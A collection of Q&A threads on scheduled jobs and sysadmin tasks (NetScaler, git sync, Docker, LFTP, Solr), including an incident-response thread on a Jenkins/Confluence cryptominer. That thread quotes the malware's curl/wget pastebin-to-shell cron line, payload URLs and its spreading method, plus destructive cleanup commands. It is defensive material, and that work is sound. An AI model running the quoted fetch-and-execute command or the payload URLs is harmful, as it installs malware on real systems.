NetScaler ADC: setting up scheduled clearing of persistence sessions

Is there a way of setting up some type of CRON job on the Netscaler VPX running firmware 11.0 to automatically clear Persistence Session Records on a daily basis?
https://docs.citrix.com/en-us/netscaler/12/load-balancing/load-balancing-persistence/clearing-persistence.html

In the /nsconfig folder you have an rc.netscaler file.
Make an entry in rc.netscaler where you add the cron job.
When you reboot, rc.netscaler will be executed.
You can also put files in the /var directory (which survives a reboot) and use an entry in /nsconfig/rc.netscaler to copy them to /etc/.... A sketch of that approach follows.
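As a minimal sketch of that idea (the file names /var/clear_persist_cron and /var/clear_persistence.sh are made-up placeholders, and the exact boot behaviour may vary by firmware build), keep the cron definition under /var and re-install it from rc.netscaler at boot:

# contents of /var/clear_persist_cron (hypothetical): clear persistence every night at 03:00
0 3 * * * /var/clear_persistence.sh

# line added to /nsconfig/rc.netscaler: re-install root's crontab on every boot,
# since /etc does not keep changes across reboots
crontab /var/clear_persist_cron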

Set up a cron job on the NetScaler's FreeBSD shell. Use the following structure for your command:
nscli -U xxx.xxx.xxx.xxx:nsroot:nsroot "clear lb persistentSessions"
Note: keep in mind you will most likely impact anyone connected at the time you run this command (it depends on your application).
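Putting the two answers together, a sketch of the helper script referenced in the crontab above might look like this (the NSIP, credentials and log path are placeholders; use a restricted account rather than nsroot where possible):

#!/bin/sh
# /var/clear_persistence.sh (hypothetical) -- clear all LB persistence session records
NSIP="xxx.xxx.xxx.xxx"     # NetScaler IP, placeholder
CRED="nsroot:nsroot"       # user:password, placeholder

nscli -U "${NSIP}:${CRED}" "clear lb persistentSessions" >> /var/log/clear_persistence.log 2>&1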

Related

How to set up 1-way sync from Bitbucket Cloud to a local folder

This might sound like a stupid question, and the use-case is rather simple, but I haven't been able to find a decent and simple solution.
In short:
I have a Bitbucket repo that I want to have synced to a local folder on my local server.
So whenever there's an upstream change, the most updated version of the file must be copied to the local folder. There is never a push/commit from local-to-cloud, it's merely a 1-way read-only sync.
Thanks in advance for any suggestions! (maybe the solution is so obvious that I don't see it?)
You don't explain what software is running on your local server, but assuming this is some flavor of UNIX/Linux/macOS and you have crontab access, the easiest thing is probably to just schedule a cron job to pull updates.
A command like the following will schedule a git update every 60 seconds, logging the output to a file:
echo '* * * * * cd $HOME/path/to/git/workdir && git pull -q --ff-only >> update-log 2>&1' | crontab
Note 1: This assumes your user currently has an empty crontab on the server; if not, you should instead use crontab -e to manually append the directive to your existing crontab.
Note 2: You'll need to ensure your account on the server has permission to access the BitBucket repo without a tty connection (e.g. without SSH agent forwarding), so you might need to fiddle with authentication to set that up (which is beyond the scope of this answer). For a public BitBucket repo, cloning via HTTPS without a user name is probably the simplest approach, since no authentication is required.
Note 3: The first * in the directive above can be adjusted to select a different polling frequency, e.g. 0,15,30,45 for every 15 minutes. If you omit the 2>&1 then you should get an email for any errors (assuming SMTP is configured on the server).
Note 4: The git command embedded above assumes you never rewrite history in the upstream git repo or manually modify the local directory. If either is a possibility, then you might instead want to use git pull -q --rebase or even git fetch && git reset --hard '@{upstream}'.
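For instance, if upstream history might be rewritten, the cron directive could use the fetch-and-reset form; a sketch under the same assumptions as above (same placeholder path and log file, 15-minute polling):

# hard-reset the working copy to the upstream branch every 15 minutes;
# note that this discards any local changes in the directory
0,15,30,45 * * * * cd $HOME/path/to/git/workdir && git fetch -q && git reset -q --hard '@{upstream}' >> update-log 2>&1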

Automatically Configure Config inside Docker Container

While setting up and configuring some Docker containers, I asked myself how I could automatically edit some config files inside the container after the containerized service has finished installing (since the config files are created at installation time).
I have tried doing that with a shell script added as the entrypoint in the Dockerfile. However, as I said, the config file does not exist right at the beginning, and hence the sed commands in the script fail.
Mounting a config file with - ./myConfig.conf:/xy/myConfig.conf is also not an option, because the config contains some installation-dependent options.
The most reasonable solution I have found was running a script that edits the config manually after the installation has finished, with docker exec -i mycontainer sh < editconfig.sh
EDIT
My question is formulated in general terms. However, it arose while working with Nextcloud in a docker-compose setup similar to the official example. That container contains a config.php file, which is the general config file of Nextcloud and is generated during the installation. Certain properties of that file have to be changed (there are only a very limited number of environment variables to specify). Since I am conducting some tests with this container, I have to repeatedly reinstall it and thus re-edit the config file.
Maybe you can try another approach and have your config file/application pick up its settings from environment variables. That would be consistent with the 12-factor app methodology (see 12factor.net).
The way I understand your case, you need your container to build its config from some template at startup.
I see a number of ways to do it:
Use a script that generates the config from a template plus arguments from the command line or environment variables (Jinja2 with Python, or Mustache with Node.js, for example). In this case your entrypoint generates the config from the template and then starts the application. To change the config you will have to restart the service (container). See the sketch after this list.
Run a service that stores the configuration and renders it at run time. Personally, I like consul-template; we use this engine actively in our environment and have had no problems so far. In this case the config is more dynamic and can be changed "on the fly". In your container you will have two processes: the application and the consul-template daemon. Obviously, you will need to run and maintain Consul. For reloading the config, restarting the application process is enough.
Run a custom script to create the config. :)
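A minimal sketch of the first option, assuming a generic service whose config lives at /etc/myapp/myapp.conf (the path, binary name and variable names are made-up examples):

#!/bin/sh
# entrypoint.sh -- render the config from environment variables, then start the app
set -e

# fall back to sane defaults if the variables are not provided
: "${MYAPP_DB_HOST:=localhost}"
: "${MYAPP_DB_PORT:=5432}"

# write the config file at container start, before the service runs
cat > /etc/myapp/myapp.conf <<EOF
db_host = ${MYAPP_DB_HOST}
db_port = ${MYAPP_DB_PORT}
EOF

# hand over to the real service so it runs as PID 1
exec myapp --config /etc/myapp/myapp.conf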

Jenkins High CPU Usage Khugepageds

The screenshot above shows a command called khugepageds that is using 98 to 100% of CPU at times.
I tried to find out how Jenkins uses this command, or what to do about it, but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When I pkill it, of course the usage goes down, but once Jenkins restarts it's back up again.
Anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill the process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
Yes, we were also hit by this vulnerability; thanks to pittss's answer we were able to find out a bit more about it.
You should check /var/log/syslog for the curl pastebin script, which starts a cron process on the system; it will keep trying to gain access to the /tmp folder and install unwanted packages/scripts.
You should remove everything from the /tmp folder, stop Jenkins, check the cron entries and remove the ones that seem suspicious, then restart the VM.
The vulnerability drops unwanted executables into the /tmp folder and tries to access the VM via ssh.
It also adds a cron entry on your system, so be sure to remove that as well.
Also check the ~/.ssh folder (known_hosts and authorized_keys) for any suspicious ssh public keys. The attacker can add their own ssh keys to regain access to your system.
Hope this helps. A rough inspection checklist is sketched below.
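A quick inspection sketch based on the steps above, run as root on the Jenkins host (the jenkins user name and the paths are common defaults and may differ on your system):

# look for the curl/wget pastebin download in the syslog
grep -i pastebin /var/log/syslog

# list cron entries for the jenkins user and the system-wide cron locations
crontab -l -u jenkins
ls -la /etc/cron.d /var/spool/cron/crontabs 2>/dev/null

# look for freshly dropped executables in /tmp
ls -la /tmp

# review SSH files the attacker may have touched
cat /var/lib/jenkins/.ssh/authorized_keys /var/lib/jenkins/.ssh/known_hosts 2>/dev/null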
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to the vulnerable path /rest/tinymce/1/macro/preview in your frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
The exploit
It contains two parts: a shell script from https://pastebin.com/raw/xmxHzu5P and an x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/virus/botnet agents, downloads the binary to /tmp/kerberods and spawns it, then iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary (size 3395072, dated Apr 5 16:19) is packed with the LSD executable packer (http://lsd.dg.com). I still haven't examined what it does; it looks like a botnet controller.
It seems like the same vulnerability. Look in the syslog (/var/log/syslog, not the Jenkins log) for something like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If you find that, try stopping Jenkins, clearing the /tmp dir and killing all PIDs started by the jenkins user.
If CPU usage drops after that, update to the latest LTS version of Jenkins, and then, after starting Jenkins, update all of its plugins.
A solution that works (because the cron file just gets recreated) is to empty the jenkins user's cron file; I also changed its ownership and made the file immutable.
This finally stopped the process from kicking in. A sketch of those commands follows.
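A sketch of that approach (the crontab path shown is the Debian/Ubuntu default; adjust it for your distribution):

# empty the jenkins crontab that the malware keeps re-creating
: > /var/spool/cron/crontabs/jenkins

# hand the file to root and make it immutable so it cannot be rewritten
chown root:root /var/spool/cron/crontabs/jenkins
chattr +i /var/spool/cron/crontabs/jenkins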
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the khugepageds process, since every place I read about this error the suggested solution was to increase memory.
The problem was solved with @HeffZilla's solution.

Continuous deployment using LFTP gets "stuck" temporarily after about 10 files

I am using GitLab Community Edition and a GitLab Runner CI setup to deploy (synchronize) a bunch of JSON files to a server using LFTP. This job, however, seems to "freeze" for a few minutes roughly every 10 files. Having to synchronize roughly 400 files sometimes, the job simply crashes because it can take more than an hour to complete. The JSON files are all 1KB. Neither the source nor the target server should have any firewall rate-limiting the FTP. Both are hosted at OVH.
The following LFTP command is executed in order to synchronize everything:
lftp -v -c "set sftp:auto-confirm true; open sftp://$DEVELOPMENT_DEPLOY_USER:$DEVELOPMENT_DEPLOY_PASSWORD@$DEVELOPMENT_DEPLOY_HOST:$DEVELOPMENT_DEPLOY_PORT; mirror -Rev ./configuration_files configuration/configuration_files --exclude .* --exclude .*/ --include ./*.json"
The job runs in Docker, using this container to deploy everything. What could cause this?
For those of you coming from Google: we had the exact same setup. The way to get LFTP to stop hanging when running in Docker or some other CI is to use a command like this:
lftp -c "set net:timeout 5; set net:max-retries 2; set net:reconnect-interval-base 5; set ftp:ssl-force yes; set ftp:ssl-protect-data true; open -u $USERNAME,$PASSWORD $HOST; mirror dist / -Renv --parallel=10"
This does several things:
It makes it so LFTP won't wait forever, or get into a continuous loop, when it can't complete a command. This should speed things along.
It makes sure we are using SSL/TLS. If you don't need this, remove those options.
It synchronizes one folder to the new location. The options -Renv are explained in the manual: https://lftp.yar.ru/lftp-man.html
Lastly, in the GitLab CI I set the job to retry if it fails. This will spin up a new Docker instance that gets around any open-file or connection limitations. The above LFTP command will run again, but since we are using the -n flag it will only move the files that were missed on the first attempt. This gets everything moved over without hassle. You can read more about CI job retries here: https://docs.gitlab.com/ee/ci/yaml/#retry
Have you looked at using rsync instead? I'm fairly sure you can benefit from the incremental copying of files as opposed to copying the entire set over each time.
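If SSH access to the target is available, a minimal rsync equivalent of the mirror above might look like this (the user, host and remote path are placeholders):

# copy only changed *.json files, deleting remote files that no longer exist locally
rsync -az --delete --include='*/' --include='*.json' --exclude='*' \
    ./configuration_files/ deployuser@target.example.com:configuration/configuration_files/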

how to swap solr core from shell

I have a Solr setup with two cores. I want to schedule a full import on the backend core (core1) frequently (e.g. every 5 minutes), then swap it with the live, serving core (core0) from a shell command through a scheduler.
For the full-import command, I am using the following shell command:
wget -o - -q -t 1 http://localhost:8080/solr/core1/dataimport?command=full-import
which works fine. If I do a core swap from the browser by hitting
http://localhost:8080/solr/admin/cores?action=SWAP&core=core1&other=core0, I get the latest updates instantly on search. But if I schedule this URL as a shell command similar to the dataimport one, it doesn't do the swap.
Did you try with
curl "http://localhost:8080/solr/admin/cores?action=SWAP&core=core1&other=core0"
from the shell? The quotes matter: without them, the shell treats the & characters in the URL as background operators and the core parameters never reach Solr, which is most likely why the scheduled swap does nothing.
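Putting it together, a hedged sketch of the scheduled job that the question asks for (host, port and core names come from the question; the schedule, script name and status check are assumptions, and the exact status string may vary by Solr version):

#!/bin/sh
# import_and_swap.sh (hypothetical) -- run from cron, e.g. */5 * * * * /path/to/import_and_swap.sh
SOLR="http://localhost:8080/solr"

# kick off the full import on the backend core; the import itself runs asynchronously
curl -s "$SOLR/core1/dataimport?command=full-import" > /dev/null

# wait until the import is no longer busy before swapping
while curl -s "$SOLR/core1/dataimport?command=status" | grep -q busy; do
    sleep 10
done

# swap the freshly imported core with the serving core
curl -s "$SOLR/admin/cores?action=SWAP&core=core1&other=core0" > /dev/null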
There is a catch with SWAPs.
Apache Solr allows you to swap two cores around for non-Cloud configurations. They take each other's name, so it is a good way to push an updated core into production without downtime.
But an interesting question is how this is achieved. Normally, the core's name is its directory name too. So, does Solr rename the directory on the filesystem as well?
Not really! Instead, the name property in the core.properties file is updated to use the name of the other core. Usually that property is used to give the core an alternative name for when the directory naming conventions are not suitable.
The gotcha is - of course - that you still have two directories with right-looking names for the cores you see in the Admin UI. So, it is very easy to forget that extra redirection/rename step when troubleshooting somebody else's - or even your own old - setup.
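For illustration, after a swap the name properties no longer match the directory names; a check like the following would show it (the data directory is an example, adjust to your install):

# compare directory names with the name property Solr actually uses
grep -H '^name=' /var/solr/data/core0/core.properties /var/solr/data/core1/core.properties
# expected output after one swap (illustrative):
# /var/solr/data/core0/core.properties:name=core1
# /var/solr/data/core1/core.properties:name=core0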
